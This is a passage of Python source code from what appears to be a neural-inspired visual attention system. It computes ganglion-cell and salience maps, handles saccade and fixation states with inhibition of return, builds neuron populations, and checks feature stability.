# *** Method 3: Multi-level Center-Surround kernels, taking maximum
for ganglionImage in self.images['Ganglion'].itervalues():
ganglionImage.fill(0.0) # reset all to zero
for k in self.ganglionKernels:
# Rod pathway
self.images['Ganglion']['ON'] = np.maximum(self.images['Ganglion']['ON'], np.clip(cv2.filter2D(self.images['Bipolar']['ON'], -1, k), 0.0, 1.0))
self.images['Ganglion']['OFF'] = np.maximum(self.images['Ganglion']['OFF'], np.clip(cv2.filter2D(self.images['Bipolar']['OFF'], -1, k), 0.0, 1.0))
# Cone pathway
imageRG = self.images['Bipolar']['L'] - self.images['Bipolar']['M']
imageRB = self.images['Bipolar']['L'] - self.images['Bipolar']['S']
imageBY = self.images['Bipolar']['S'] - (self.images['Bipolar']['L'] + self.images['Bipolar']['M']) / 2
self.images['Ganglion']['RG'] = np.maximum(self.images['Ganglion']['RG'], np.clip(cv2.filter2D(imageRG, -1, k), 0.0, 1.0))
self.images['Ganglion']['GR'] = np.maximum(self.images['Ganglion']['GR'], np.clip(cv2.filter2D(-imageRG, -1, k) * 1.6, 0.0, 1.0)) # TODO: formalize this fixed relative weighting scheme to counter unequal color representation
self.images['Ganglion']['RB'] = np.maximum(self.images['Ganglion']['RB'], np.clip(cv2.filter2D(imageRB, -1, k), 0.0, 1.0))
self.images['Ganglion']['BR'] = np.maximum(self.images['Ganglion']['BR'], np.clip(cv2.filter2D(-imageRB, -1, k), 0.0, 1.0))
self.images['Ganglion']['BY'] = np.maximum(self.images['Ganglion']['BY'], np.clip(cv2.filter2D(imageBY, -1, k), 0.0, 1.0))
self.images['Ganglion']['YB'] = np.maximum(self.images['Ganglion']['YB'], np.clip(cv2.filter2D(-imageBY, -1, k) * 1.6, 0.0, 1.0)) # TODO: also here
# * Compute combined (salience) image; TODO incorporate attention weighting (spatial, as well as by visual feature)
# ** Method 1: Max of all Ganglion cell images
self.images['Salience'].fill(0.0)
for ganglionType, ganglionImage in self.images['Ganglion'].iteritems():
#self.images['Salience'] = np.maximum(self.images['Salience'], ganglionImage)
#self.logger.debug("[Salience] Combining {}".format(self.featurePathways[ganglionType])) # [verbose]
self.images['Salience'] = np.maximum(self.images['Salience'], np.sqrt(self.featurePathways[ganglionType].p) * ganglionImage) # take maximum, scaled by feature pathway probabilities (for display only)
#self.images['Salience'] = self.images['Salience'] + (self.numGanglionTypes_inv * np.sqrt(self.featurePathways[ganglionType].p) * ganglionImage) # take normalized sum (mixes up features), scaled by feature pathway probabilities (for display only)
# * Update FINSTs if decay is enabled (otherwise activation doesn't change, FINSTs are purged when there's no more room)
if self.finst_decay_enabled:
for finst in self.finsts:
finst.update(self.timeNow)
# Remove stale FINSTs (TODO: use priority queue, don't depend on FINSTs being sorted by activation)
while self.finsts and self.finsts[0].activation < Finst.min_good_activation:
self.finsts.popleft()
# * Apply inhibition based on FINSTs
if self.finst_inhibition_enabled and self.finsts:
self.logger.debug("Current FINSTs: {}".format(", ".join(str(finst) for finst in self.finsts)))
for finst in self.finsts:
self.inhibitMapAtFinst(self.images['Salience'], finst)
self.images['Salience'] = cv2.blur(self.images['Salience'], (3, 3)) # blur slightly to smooth out specs
self.images['Salience'] *= self.images['Weight'] # effectively reduces salience around the edges (which can sometime give artificially high values due to partial receptive fields)
_, self.maxSalience, _, self.maxSalienceLoc = cv2.minMaxLoc(self.images['Salience']) # find out most salient location (from combined salience map)
self.logger.debug("Max. salience value: {:5.3f} @ {}".format(self.maxSalience, self.maxSalienceLoc)) # [verbose]
# * Compute features along each pathway
if self.context.options.gui and self.context.options.debug:
self.imageSalienceOutCombined.fill(0.0)
for pathwayLabel, featurePathway in self.featurePathways.iteritems():
if featurePathway.active:
# ** Update feature pathway populations (TODO find a more reliable way of grabbing salience and selection neuron populations)
#featurePathway.update(self.timeNow) # currently doesn't do anything, update populations explicitly
salienceNeurons = featurePathway.populations[0]
selectionNeurons = featurePathway.populations[1]
featureNeurons = featurePathway.populations[2]
# *** Salience neurons
for salienceNeuron in salienceNeurons.neurons:
#salienceNeuron.update(timeNow) # update every iteration
#salienceNeuron.updateWithP(timeNow) # update using intrinsic probability (adaptive)
if np.random.uniform() < featurePathway.p: # update using pathway probability (TODO try to make this adaptive?)
salienceNeuron.update(timeNow)
#self.logger.debug("{} Salience neuron potential: {:.3f}, response: {:.3f}, I_e: {}, pixelValue: {}".format(pathwayLabel, salienceNeuron.potential, salienceNeuron.response, salienceNeuron.I_e, salienceNeuron.pixelValue))
# *** Selection neurons (TODO mostly duplicated code, perhaps generalizable?)
for selectionNeuron in selectionNeurons.neurons:
#selectionNeuron.update(timeNow) # update every iteration
#selectionNeuron.updateWithP(timeNow) # update using intrinsic probability (adaptive)
if np.random.uniform() < featurePathway.p: # update using pathway probability (TODO try to make this adaptive?)
selectionNeuron.update(timeNow)
else:
selectionNeuron.potentialAccumulated = 0.0 # clear any accumulated potential, effectively inhibiting the selection neuron
#self.logger.debug("{} Selection neuron potential: {:.3f}, pixelValue: {}".format(pathwayLabel, selectionNeuron.potential, selectionNeuron.pixelValue))
# **** Pick one selection neuron, inhibit others
# TODO Use a top-level feature neuron with graded potential to return activation level
#numUninhibitedFired = 0 # [debug]
for selectionNeuron in selectionNeurons.neurons:
# Render selection neuron's position with response-based pixel value (TODO build receptive field when synapses are made, or later, using a stimulus test phase?)
#if selectionNeuron.pixelValue > 200: print "[{:.2f}] {}".format(timeNow, selectionNeuron) # [debug]
if not selectionNeuron.isInhibited and selectionNeuron.timeLastFired == timeNow: # only deal with uninhibited neurons that just fired in this iteration
#numUninhibitedFired += 1 # [debug]
#cv2.circle(self.imageSelectionOut, (selectionNeuron.pixel[0], selectionNeuron.pixel[1]), self.imageSize[0] / 20, selectionNeuron.pixelValue, cv.CV_FILLED) # only render the one selected neuron, later
featurePathway.selectedNeuron = selectionNeuron
featurePathway.selectedTime = timeNow
featurePathway.selectedNeuron.inhibit(timeNow, neuron_inhibition_period + 0.75) # inhibit selected neuron for a bit longer
break # first uninhibited SelectionNeuron will be our selected neuron
#print "# Uninhibited selection neurons that fired: {}".format(numUninhibitedFired) # [debug]
# *** Feature neuron
for featureNeuron in featureNeurons.neurons:
featureNeuron.update(timeNow) # update every iteration
#featureNeuron.updateWithP(timeNow) # update probabilistically
#self.logger.debug("{} Feature neuron potential: {:.3f}, pixelValue: {}".format(pathwayLabel, featureNeuron.potential, featureNeuron.pixelValue))
# ** Render output images and show them (per feature pathway, better show in debug mode only)
if self.context.options.gui and self.context.options.debug:
# *** Salience neurons
self.imageSalienceOut.fill(0.0)
for salienceNeuron in salienceNeurons.neurons:
# Render salience neuron's receptive field with response-based pixel value (TODO cache int radii and pixel as tuple?)
#cv2.circle(self.imageSalienceOut, (salienceNeuron.pixel[0], salienceNeuron.pixel[1]), np.int_(salienceNeuron.rfRadius), 128) # outer radius of surround as a boundary
cv2.circle(self.imageSalienceOut, (salienceNeuron.pixel[0], salienceNeuron.pixel[1]), np.int_(salienceNeuron.rfCenterRadius), salienceNeuron.pixelValue, cv.CV_FILLED) # inner center field, filled with current value
self.imageSalienceOutCombined = np.maximum(self.imageSalienceOutCombined, self.imageSalienceOut)
# *** Selection neurons
if featurePathway.selectedNeuron is not None and (timeNow - featurePathway.selectedTime) < 3.0:
#self.imageSelectionOut.fill(0.0)
cv2.circle(self.imageSalienceOut, (featurePathway.selectedNeuron.pixel[0], featurePathway.selectedNeuron.pixel[1]), featurePathway.selectedNeuron.rfRadius, int(255 * exp(featurePathway.selectedTime - timeNow)), 2) # draw selected neuron with a shade that fades with time (on salience output image)
#cv2.circle(self.imageSelectionOut, (featurePathway.selectedNeuron.pixel[0], featurePathway.selectedNeuron.pixel[1]), featurePathway.selectedNeuron.rfRadius, int(255 * exp(featurePathway.selectedTime - timeNow)), cv.CV_FILLED) # draw selected neuron with a shade that fades with time
cv2.imshow("{} Salience".format(pathwayLabel), self.imageSalienceOut)
#cv2.imshow("{} Selection".format(pathwayLabel), self.imageSelectionOut)
# * TODO Compute feature vector of attended region
# * Post-processing: Write to output buffers, state-based actions, check for transitions
self.buffers['salience'].set_out(self.maxSalience)
self.buffers['location'].set_out(self.toCenterRelative(self.maxSalienceLoc))
self.updateFeatureVector() # external buffer reads may need this
if self.state == self.State.FREE:
if self.maxSalience >= self.min_good_salience or \
(self.maxSalience >= self.min_saccade_salience and self.timeNow > (self.lastTransitionTime + self.max_free_duration)): # we have good (or good enough) salience, lets saccade to it
self.saccadeSalience = self.maxSalience
self.saccadeTarget = np.int_(self.buffers['location'].get_out()) # ocular motion system requires a 2-element numpy array
self.performSaccade(self.saccadeTarget)
elif self.timeNow > (self.lastTransitionTime + self.max_free_duration): # we've been waiting too long, nothing significant, let's reset
self.performSaccade(None) # TODO: Probabilistically choose a not-so-good location?
elif self.state == self.State.FIXATE:
# Update fixation location (first time this fixation only)
# TODO: Maybe a good idea to use a new FIXATED state after FIXATE?
if self.fixationLoc is None:
self.fixationLoc = self.maxSalienceLoc
self.fixationSlice = np.index_exp[int(self.fixationLoc[1] - self.foveaSize[1] / 2):int(self.fixationLoc[1] + self.foveaSize[1] / 2), int(self.fixationLoc[0] - self.foveaSize[0] / 2):int(self.fixationLoc[0] + self.foveaSize[0] / 2)]
# NOTE: This slice could be smaller than self.foveaSize
self.logger.info("Fixated at: {}, fixation slice: {}".format(self.fixationLoc, self.fixationSlice))
# Update feature vector representing current state of neurons
self.logger.debug("[{:.2f}] Features: {}".format(self.timeNow, self.featureVector)) # [verbose]
#self.logger.debug("[{:.2f}] Feature matrix:\n {}".format(self.timeNow, "\n ".join("{}: {}".format(label, self.featureMatrix[i]) for i, label in enumerate(self.featureLabels)))) # [very verbose!]
self.buffers['features'].set_out(dict(izip(self.featureLabels, self.featureVector))) # TODO: find a better way than zipping every iteration (named tuple or something?)
if self.timeNow > (self.lastTransitionTime + self.min_fixation_duration):
# TODO: Update match buffer based on feature values and weights
# TODO: Compute utility based on duration of fixation (falling activation), match and/or salience
# TODO: If very high utility, turn on hold (assuming agent will ask us to release)
# If low utility or past max_fixation_duration, switch to FREE state and look somewhere else
maxSalienceLocDist = hypot(self.maxSalienceLoc[0] - self.fixationLoc[0], self.maxSalienceLoc[1] - self.fixationLoc[1])
# Put a limit on hold
if self.hold and self.timeNow > (self.lastTransitionTime + self.max_hold_duration):
self.hold = False # NOTE: This forcefully breaks a hold; might be better to depend on salient stimuli
# Check for possible transitions out of FIXATE
if not self.hold and \
(maxSalienceLocDist > self.fovealRadius or \
self.maxSalience < self.saccadeSalience or \
self.timeNow > (self.lastTransitionTime + self.max_fixation_duration)):
# Create FINST to inhibit current location in future, before switching to FREE
if self.maxSalience >= self.min_saccade_salience: # if current location is still salient enough to elicit a saccade
self.finsts.append(Finst(self.fixationLoc, self.ocularMotionSystem.getFocusPoint(), timeCreated=self.timeNow)) # TODO: pass in activationCreated once FINSTs are stored in priority queue
self.fixationLoc = None # set to None to indicate we're no longer fixated; next fixation will store a new location
self.transition(self.State.FREE)
# * Show output images if in GUI mode
if self.context.options.gui:
#cv2.imshow("Hue", self.images['H'])
#cv2.imshow("Saturation", self.images['S'])
#cv2.imshow("Value", self.images['V'])
if self.context.options.debug: # only show detail when in debug mode; limit to important images/maps
#cv2.imshow("Rod response", self.images['Rod'])
#for coneType, coneImage in self.images['Cone'].iteritems():
# cv2.imshow("{} Cones".format(coneType), coneImage)
for bipolarType, bipolarImage in self.images['Bipolar'].iteritems():
cv2.imshow("{} Bipolar cells".format(bipolarType), bipolarImage)
for ganglionType, ganglionImage in self.images['Ganglion'].iteritems():
cv2.imshow("{} Ganglion cells".format(ganglionType), ganglionImage)
#cv2.imshow("{} Ganglion cells".format(ganglionType), np.sqrt(self.featurePathways[ganglionType].p) * ganglionImage) # show image weighted by selected feature probability, artificially scaled to make responses visible
#cv2.imshow("Salience", self.images['Salience']) # combined salience image
# Designate a representative output image
#self.imageOut = cv2.bitwise_and(self.retina.images['BGR'], self.retina.images['BGR'], mask=self.imageSelectionOut) # mask out everything outside selected neuron's receptive field
self.imageOut = self.images['Salience'] # make a copy?
#_, self.imageOut = cv2.threshold(self.imageOut, 0.1, 1.0, cv2.THRESH_TOZERO) # apply threshold to remove low-response regions
self.imageOut = np.uint8(self.imageOut * 255) # convert to uint8 image for display (is this necessary?)
if self.maxSalience >= self.min_saccade_salience:
cv2.circle(self.imageOut, self.maxSalienceLoc, 3, 175, -1) # mark most salient location with a small faint dot
if self.maxSalience >= self.min_good_salience:
cv2.circle(self.imageOut, self.maxSalienceLoc, int(self.maxSalience * 25), int(128 + self.maxSalience * 127), 1 + int(self.maxSalience * 4)) # highlight highly salient locations: larger, fatter, brighter for higher salience value
if self.state == self.State.FIXATE and self.fixationLoc is not None:
cv2.circle(self.imageOut, self.fixationLoc, 1, 225, -1) # mark fixation location with a tiny bright dot
cv2.putText(self.imageOut, self.State.toString(self.state) + (" (holding)" if self.hold else ""), (20, 40), cv2.FONT_HERSHEY_PLAIN, 1.5, 200, 2) # show current state
return True, self.imageOut
def stop(self):
# TODO Ensure this gets called for proper clean-up, esp. now that we are using an animated plot
if self.context.options.gui:
self.neuronPotentialMonitor.stop()
def transition(self, next_state):
self.logger.info("[{:.2f}] Transitioning from {} to {} state after {:.2f}s".format(self.timeNow, self.State.toString(self.state), self.State.toString(next_state), (self.timeNow - self.lastTransitionTime)))
self.state = next_state
self.lastTransitionTime = self.timeNow
self.buffers['state'].set_out(self.state) # update corresponding buffer
def handleIntent(self, intent):
if intent is None or intent not in self.intents:
self.logger.warning("Unknown/null intent: '%s'", intent)
return
self.logger.info("Intent: %s", intent)
if intent == 'find':
# NOTE All relevant buffers must be set *before* find intent is sent in
self.transition(self.State.FREE) # reset state to use new weights
self.hold = False # implies we can move around again
elif intent == 'hold':
self.hold = True # system won't perform saccades, even if utility drops
if self.state == self.State.FREE:
self.transition(self.State.FIXATE) # transition to FIXATE state (unless performing a saccade)
elif intent == 'release':
self.hold = False # system can resume FIXATE-SACCADE cycle
elif intent == 'reset':
self.finsts.clear()
self.transition(self.State.SACCADE)
self.ocularMotionSystem.reset() # reset to the center of visual stream
self.hold = False
else:
self.logger.warning("Unhandled intent: '%s'", intent)
def performSaccade(self, saccadeTarget=None):
if self.ocularMotionSystem is not None:
self.transition(self.State.SACCADE)
if saccadeTarget is not None:
self.ocularMotionSystem.move(saccadeTarget)
else:
self.ocularMotionSystem.reset()
else:
self.logger.warning("Ocular motion system not found, skipping to FIXATE")
self.transition(self.State.FIXATE)
def inhibitMapAtFinst(self, imageMap, finst):
loc = finst.getAdjustedLocation(self.ocularMotionSystem.getFocusPoint())
#cv2.circle(imageMap, loc, finst.radius, 0.0, cv.CV_FILLED) # hard inhibition with solid 0 circle
# Soft inhibition using finst.inhibitionMap (TODO: affected by finst.activation?)
inhibitionTarget = imageMap[max(loc[1] - finst.radius, 0):min(loc[1] + finst.radius, imageMap.shape[0]), max(loc[0] - finst.radius, 0):min(loc[0] + finst.radius, imageMap.shape[1])]
sourceTopLeft = (max(finst.radius - loc[1], 0), max(finst.radius - loc[0], 0)) # (y, x)
inhibitionSource = finst.inhibitionMap[sourceTopLeft[0]:(sourceTopLeft[0] + inhibitionTarget.shape[0]), sourceTopLeft[1]:(sourceTopLeft[1] + inhibitionTarget.shape[1])]
#self.logger.debug("loc: {}, source.shape: {}, target.shape: {}, sourceTopLeft: {}".format(loc, inhibitionSource.shape, inhibitionTarget.shape, sourceTopLeft))
inhibitionTarget *= (1.0 - finst.activation * inhibitionSource)
#cv2.putText(imageMap, "{:.2f}".format(finst.timeCreated), (loc[0] + finst.radius, loc[1] - finst.radius), cv2.FONT_HERSHEY_PLAIN, 1, 0.0) # [debug]
def updateFeatureWeights(self, featureWeights, rest=None):
"""Update weights for features mentioned in given dict, using rest for others if not None."""
# TODO Handle special labels for spatial selection
if rest is None:
rest = featureWeights.get('rest', None) # rest may also be passed in as a dict item
for label, pathway in self.featurePathways.iteritems():
if label in featureWeights:
pathway.p = featureWeights[label]
elif rest is not None:
pathway.p = rest
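# Illustrative usage of updateFeatureWeights() (hypothetical instance and pathway labels, for clarity only):
#   visualSystem.updateFeatureWeights({'SomePathway': 0.9}, rest=0.1)  # bias salience toward one pathway
#   visualSystem.updateFeatureWeights({'rest': 0.5})                   # 'rest' may also be passed inside the dict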
def updateFeatureVector(self):
# TODO: Also compute mean and variance over a moving window here? (or should that be an agent/manager-level function?)
# Feature vector picks a single value from each channel
self.featureVector = np.float32([pathway.output.neurons[0].potential for pathway in self.featurePathways.itervalues()])
# Feature matrix picks all neuron values from each channel
self.featureMatrix = np.float32([[neuron.potential for neuron in pathway.output.neurons] for pathway in self.featurePathways.itervalues()])
def toCenterRelative(self, coords):
return (coords[0] - self.imageCenter[0], coords[1] - self.imageCenter[1]) # convert to center-relative coordinates
def createPopulation(self, *args, **kwargs):
"""Create a basic Population with given arguments."""
return self.addPopulation(Population(*args, **kwargs))
def addPopulation(self, population):
"""Add a given Population to this VisualSystem."""
#assert isinstance(population, Population) # allow other Population-like objects?
assert population.label not in self.populations # refuse to overwrite existing population with same label
self.populations.append(population)
return population
def createProjection(self, presynaptic_population, postsynaptic_population, **kwargs):
"""Create a basic Projection from presynaptic to postsynaptic population, with given keyword arguments."""
assert presynaptic_population in self.populations and postsynaptic_population in self.populations
return self.addProjection(Projection(presynaptic_population, postsynaptic_population, **kwargs))
def addProjection(self, projection):
self.projections.append(projection)
return projection
def createRetina(self):
# TODO * Create Photoreceptor layer
# TODO * Create BipolarCell layer
# TODO * Create GanglionCell layer
pass
def createVisualCortex(self):
# * Create several feature pathways, each with a salience, selection and feature layer
self.featureLabels = self.images['Ganglion'].keys() # cached for frequent use (NOTE currently will need to be updated if self.images['Ganglion'] changes)
self.featurePathways = OrderedDict()
for pathwayLabel in self.featureLabels: # Ganglion cells are the source of each low-level visual pathway
self.logger.info("Creating '{}' feature pathway".format(pathwayLabel))
# ** Create layers
# *** Salience neurons (TODO introduce magno and parvo types; expose layer parameters such as Z-axis position)
salienceLayerBounds = np.float32([[0.0, 0.0, 0.0], [self.imageSize[0] - 1, self.imageSize[1] - 1, 0.0]])
salienceNeuronDistribution = MultivariateNormal(mu=self.center, cov=(np.float32([self.center[0] ** 1.5, self.center[1] ** 1.5, 1.0]) * np.identity(3, dtype=np.float32)))
#salienceNeuronDistribution = MultivariateUniform(lows=[0.0, 0.0, 0.0], highs=[self.imageSize[0], self.imageSize[1], 0.0])
salienceNeurons = Population(numNeurons=self.num_salience_neurons, timeNow=self.timeNow, neuronTypes=[SalienceNeuron], bounds=salienceLayerBounds, distribution=salienceNeuronDistribution, system=self, pathway=pathwayLabel, imageSet=self.images['Ganglion'])
# TODO self.addPopulation(salienceNeurons)?
# *** Selection neurons
selectionLayerBounds = np.float32([[0.0, 0.0, 50.0], [self.imageSize[0] - 1, self.imageSize[1] - 1, 50.0]])
selectionNeuronDistribution = MultivariateNormal(mu=self.center + np.float32([0.0, 0.0, 50.0]), cov=(np.float32([self.center[0] ** 1.5, self.center[1] ** 1.5, 1.0]) * np.identity(3, dtype=np.float32)))
#selectionNeuronDistribution = MultivariateUniform(lows=[0.0, 0.0, 50.0], highs=[self.imageSize[0], self.imageSize[1], 50.0])
selectionNeurons = Population(numNeurons=self.num_selection_neurons, timeNow=self.timeNow, neuronTypes=[SelectionNeuron], bounds=selectionLayerBounds, distribution=selectionNeuronDistribution, system=self, pathway=pathwayLabel)
# TODO self.addPopulation(selectionNeurons)?
# *** Feature neurons (usually a single neuron for most non spatially-sensitive features)
featureLayerBounds = np.float32([[0.0, 0.0, 100.0], [self.imageSize[0] - 1, self.imageSize[1] - 1, 100.0]])
featureNeuronDistribution = MultivariateNormal(mu=self.center + np.float32([0.0, 0.0, 100.0]), cov=(np.float32([self.center[0] / 10, self.center[1] / 10, 1.0]) * np.identity(3, dtype=np.float32))) # positioning doesn't matter much
featureNeurons = Population(numNeurons=self.num_feature_neurons, timeNow=self.timeNow, neuronTypes=[FeatureNeuron], bounds=featureLayerBounds, distribution=featureNeuronDistribution, system=self, pathway=pathwayLabel)
# TODO Set feature neuron plotColor to something more representative of the pathway
# ** Connect neuron layers
# *** Salience neurons to selection neurons (TODO use createProjection() once Projection is implemented, and register using self.addProjection)
salienceNeurons.connectWith(selectionNeurons, maxConnectionsPerNeuron=5)
# For selection neurons, finalize their receptive field radii based on connected neurons (average distance to extrema)
minRFRadius = None
maxRFRadius = None
for selectionNeuron in selectionNeurons.neurons:
xlim = [selectionNeuron.location[0], selectionNeuron.location[0]] # min, max
ylim = [selectionNeuron.location[1], selectionNeuron.location[1]] # min, max
for inputNeuron in selectionNeuron.inputNeurons:
xlim[0] = min(xlim[0], inputNeuron.location[0] - inputNeuron.rfRadius)
xlim[1] = max(xlim[1], inputNeuron.location[0] + inputNeuron.rfRadius)
ylim[0] = min(ylim[0], inputNeuron.location[1] - inputNeuron.rfRadius)
ylim[1] = max(ylim[1], inputNeuron.location[1] + inputNeuron.rfRadius)
selectionNeuron.rfRadius = int((hypot(xlim[0] - selectionNeuron.location[0], ylim[0] - selectionNeuron.location[1]) + \
hypot(xlim[1] - selectionNeuron.location[0], ylim[1] - selectionNeuron.location[1])) / 2)
# NOTE: We don't need much precision for this estimated RF radius - it is mainly used to categorize these neurons into broad groups, and for display
if minRFRadius is None or selectionNeuron.rfRadius < minRFRadius:
minRFRadius = selectionNeuron.rfRadius
if maxRFRadius is None or selectionNeuron.rfRadius > maxRFRadius:
maxRFRadius = selectionNeuron.rfRadius
# *** Selection neurons to feature neurons (all-to-all, filtered by receptive field size)
featureRFRadiusStep = float(maxRFRadius - minRFRadius) / self.num_feature_neurons # size of each uniform RF radius division to categorize input neurons in the featureNeurons layer
for source in selectionNeurons.neurons:
# All-to-all
#for target in featureNeurons.neurons:
# source.synapseWith(target)
# Filtered by receptive field size
idx = int((source.rfRadius - minRFRadius) / featureRFRadiusStep)
if idx >= self.num_feature_neurons:
idx = self.num_feature_neurons - 1 # ensure idx is in range
source.synapseWith(featureNeurons.neurons[idx]) # connect with appropriate feature neuron
selectionNeurons.isConnected = True # NOTE need to explicitly do this since we're not using Population.connectWith()
# *** Selection neurons to themselves (lateral inhibition; TODO make this a re-entrant inhibitory Projection with allow_self_connections=False?)
for source in selectionNeurons.neurons:
for target in selectionNeurons.neurons:
if source == target: continue
source.gateNeuron(target)
# ** Add to dictionary of feature pathways
self.featurePathways[pathwayLabel] = VisualFeaturePathway(label=pathwayLabel, populations=[salienceNeurons, selectionNeurons, featureNeurons], projections=None, output=featureNeurons, timeNow=self.timeNow)
# ** Show neuron layers and connections [debug]
#plotPopulations([salienceNeurons, selectionNeurons, featureNeurons], showConnections=True, equalScaleZ=True) # [debug]
# * Initialize feature vector
self.featureVector = None
self.updateFeatureVector()
@rpc.enable
def getBuffer(self, name):
try:
value = self.buffers[name].get()
if callable(value): # allows output buffer values to be callables (e.g. getter functions) that get called when retrieved
value = value()
#self.logger.debug("%s: %s", name, value) # [verbose]
return value
except KeyError as e:
self.logger.error("Buffer KeyError: %s", e)
except BufferAccessError as e:
self.logger.error("BufferAccessError (get '%s'): %s", name, e)
return None # failed
@rpc.enable
def setBuffer(self, name, value):
try:
#self.logger.debug("%s: %s", name, value) # [verbose]
obj = self.buffers[name].value # NOTE direct access (not encouraged - can this be done using simple Python properties?)
if callable(obj): # allows input buffer values to be callables (e.g. setter functions) that get called when the buffer is written to
obj(value)
else:
self.buffers[name].set(value)
return True # NOTE may not give the right indication if obj was a callable and returned a meaningful value
except KeyError as e:
self.logger.error("Buffer KeyError: %s", e)
except BufferAccessError as e:
self.logger.error("BufferAccessError (set '%s'): %s", name, e)
return False # failed
@rpc.enable
def listBuffers(self, types=False):
"""Return a list of exposed buffers (flat list), optionally with each buffer's type as well (list of 2-tuples)."""
return [(name, buf.__class__.__name__) if types else name for name, buf in self.buffers.iteritems()]
@rpc.enable_image
def getImage(self, key='BGR'):
try:
return self.images[key]
except KeyError as e:
self.logger.error("Image KeyError: %s", e)
return None
@rpc.enable_image
def getFovealImage(self, key='BGR'):
try:
return self.images[key][self.fovealSlice]
except KeyError as e:
self.logger.error("Image KeyError: %s", e)
return None
@rpc.enable_image
def getFixatedImage(self, key='BGR'):
try:
return self.images[key][self.fixationSlice]
except KeyError as e:
self.logger.error("Image KeyError: %s", e)
return None
@rpc.enable_image
def getOutputImage(self):
if self.context.options.gui:
return self.imageOut
else:
return None
class VisionManager(Projector):
"""A version of Projector that defaults to using a VisualSystem as target."""
def __init__(self, target=None, *args, **kwargs):
Projector.__init__(self, target if target is not None else VisualSystem(), *args, **kwargs)
self.visualSystem = self.target # synonym - Projector uses the generic term target
self.ocularMotionSystem = EmulatedOcularMotionSystem(self, timeNow=self.context.timeNow)
self.visualSystem.ocularMotionSystem = self.ocularMotionSystem
def process(self, imageIn, timeNow):
self.ocularMotionSystem.update(timeNow)
return Projector.process(self, imageIn, timeNow)
class FeatureManager(VisionManager):
"""A visual system manager for computing stable features."""
State = Enum(('NONE', 'INCOMPLETE', 'UNSTABLE', 'STABLE'))
min_duration_incomplete = 2.0 # min. seconds to spend in incomplete state before transitioning (rolling buffer not full yet/neurons not activated enough)
min_duration_unstable = 2.0 # min. seconds to spend in unstable state before transitioning (avoid short stability periods)
max_duration_unstable = 5.0 # max. seconds to spend in unstable state before transitioning (avoid being stuck waiting forever for things to stabilize)
min_duration_stable = 0.5 # avoid quick switches (attention deficiency)
max_duration_stable = 2.0 # don't stare for too long (excess fixation)
feature_buffer_size = 10 # number of iterations/samples to compute feature vector statistics over (rolling window)
max_feature_sd = 0.005 # max. s.d. (units: Volts) to tolerate in judging a signal as stable
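# Summary of the stability test implemented in process() below: feature statistics are taken over a
# rolling window of the last feature_buffer_size samples, and the signal is judged STABLE once
# np.max(featureVectorSD) <= max_feature_sd (returning to UNSTABLE when it rises above that value),
# subject to the min/max state-duration limits defined above.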
def __init__(self, *args, **kwargs):
kwargs['screen_background'] = kwargs.get('screen_background', np.uint8([0, 0, 0]))
VisionManager.__init__(self, *args, **kwargs)
self.state = self.State.NONE
self.lastTransitionTime = -1.0
def initialize(self, imageIn, timeNow):
VisionManager.initialize(self, imageIn, timeNow)
self.numFeatures = len(self.visualSystem.featureVector)
self.featureVectorBuffer = np.zeros((self.feature_buffer_size, self.numFeatures), dtype=np.float32) # rolling buffer of feature vector samples
self.featureVectorIndex = 0 # index into feature vector buffer (count modulo buffer size)
self.featureVectorCount = 0 # no. of feature vector samples collected (same as index, sans modulo)
self.featureVectorMean = np.zeros(self.numFeatures, dtype=np.float32) # column mean of values in buffer
self.featureVectorSD = np.zeros(self.numFeatures, dtype=np.float32) # standard deviation of values in buffer
self.featureMatrixBuffer = np.zeros((self.feature_buffer_size, self.numFeatures, self.visualSystem.num_feature_neurons), dtype=np.float32) # follows featureVectorBuffer
self.featureMatrixMean = np.zeros((self.numFeatures, self.visualSystem.num_feature_neurons), dtype=np.float32) # follows featureVectorMean
self.logger.info("[{:.2f}] Features: {}".format(timeNow, self.visualSystem.featureLabels))
self.transition(self.State.INCOMPLETE, timeNow)
self.logger.debug("Initialized")
def process(self, imageIn, timeNow):
keepRunning, imageOut = VisionManager.process(self, imageIn, timeNow)
# Compute featureVector mean and variance over a moving window (also featureMatrix mean)
self.featureVectorBuffer[self.featureVectorIndex, :] = self.visualSystem.featureVector
self.featureMatrixBuffer[self.featureVectorIndex, :] = self.visualSystem.featureMatrix
self.featureVectorCount += 1
self.featureVectorIndex = self.featureVectorCount % self.feature_buffer_size
np.mean(self.featureVectorBuffer, axis=0, dtype=np.float32, out=self.featureVectorMean) # always update mean, in case someone needs it
# TODO: debug here
np.mean(self.featureMatrixBuffer, axis=0, dtype=np.float32, out=self.featureMatrixMean)
# Change state according to feature vector values (and visual system's state)
deltaTime = timeNow - self.lastTransitionTime
if self.state == self.State.INCOMPLETE and \
deltaTime > self.min_duration_incomplete and \
self.featureVectorCount >= self.feature_buffer_size and \
self.visualSystem.state == VisualSystem.State.FIXATE:
self.visualSystem.setBuffer('intent', 'hold') # ask system to hold gaze (i.e. no saccades)
self.transition(self.State.UNSTABLE, timeNow)
elif self.state == self.State.UNSTABLE or self.state == self.State.STABLE:
if self.visualSystem.state == VisualSystem.State.FIXATE:
np.std(self.featureVectorBuffer, axis=0, dtype=np.float32, out=self.featureVectorSD)
self.logger.debug("[{:.2f}] Mean: {}".format(timeNow, self.featureVectorMean)) # [verbose]
self.logger.debug("[{:.2f}] S.D.: {}".format(timeNow, self.featureVectorSD)) # [verbose]
self.logger.debug("[{:.2f}] Feature matrix:\n {}".format(timeNow, "\n ".join("{}: {}".format(label, self.featureMatrixMean[i]) for i, label in enumerate(self.visualSystem.featureLabels))))
if self.state == self.State.UNSTABLE and deltaTime > self.min_duration_unstable and \
(np.max(self.featureVectorSD) <= self.max_feature_sd or deltaTime > self.max_duration_unstable): # TODO use a time-scaled low-pass filtered criteria
self.transition(self.State.STABLE, timeNow)
elif self.state == self.State.STABLE and deltaTime > self.min_duration_stable and \
(np.max(self.featureVectorSD) > self.max_feature_sd or deltaTime > self.max_duration_stable):
self.transition(self.State.UNSTABLE, timeNow)
self.visualSystem.setBuffer('intent', 'find') # let system return to FIXATE-SACCADE mode (without inhibition)
else: # something made visual system lose focus, including us releasing the system
self.transition(self.State.INCOMPLETE, timeNow)
return keepRunning, imageOut
def transition(self, next_state, timeNow):
self.logger.debug("[{:.2f}] Transitioning from {} to {} state after {:.2f}s".format(timeNow, self.State.toString(self.state), self.State.toString(next_state), (timeNow - self.lastTransitionTime)))
self.state = next_state
self.lastTransitionTime = timeNow
@rpc.enable
def getState(self):
return self.State.toString(self.state)
@rpc.enable
def getFeatureVector(self):
return self.featureVectorMean.tolist()
@rpc.enable
def getFeatureMatrix(self):
